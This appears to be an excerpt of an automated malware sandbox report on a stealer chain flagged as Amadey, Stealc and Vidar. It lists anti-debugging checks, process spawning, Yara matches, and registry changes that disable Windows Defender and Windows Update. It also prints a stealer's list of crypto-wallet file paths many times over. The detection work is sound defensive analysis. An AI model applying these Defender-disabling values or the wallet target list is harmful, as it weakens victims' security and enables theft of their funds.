Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_04A30BED rdtsc 22_2_04A30BED
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB35FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CB35FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CAD3480
Contains functionality to read the PEB
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E7652B mov eax, dword ptr fs:[00000030h] 22_2_00E7652B
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E7A302 mov eax, dword ptr fs:[00000030h] 22_2_00E7A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C6A302 mov eax, dword ptr fs:[00000030h] 23_2_00C6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C6652B mov eax, dword ptr fs:[00000030h] 23_2_00C6652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C6A302 mov eax, dword ptr fs:[00000030h] 24_2_00C6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C6652B mov eax, dword ptr fs:[00000030h] 24_2_00C6652B
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CB0B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CB0B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCBAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CCBAC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 9148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 8412, type: MEMORYSTR
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCBAKJEHDBG.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsCBAKJEHDBG.exe "C:\Users\user\DocumentsCBAKJEHDBG.exe"
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe "C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe "C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CD04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6CD04760
Source: file.exe, file.exe, 00000000.00000002.2619954244.0000000000986000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: pProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B341 cpuid 0_2_6CB0B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6CAD35A0

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 23.2.skotes.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.skotes.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.DocumentsCBAKJEHDBG.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2672523079.0000000000C31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2651768061.0000000000E41000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2672723810.0000000000C31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000001D.00000002.3017859957.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3093978577.00000000005F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2976420926.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2874044959.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3053437488.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3016848121.00000000005F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3094796057.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2831544731.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2134993992.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2625469567.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2619339487.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2871777456.00000000005F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 9148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80b5f835af.exe PID: 8412, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 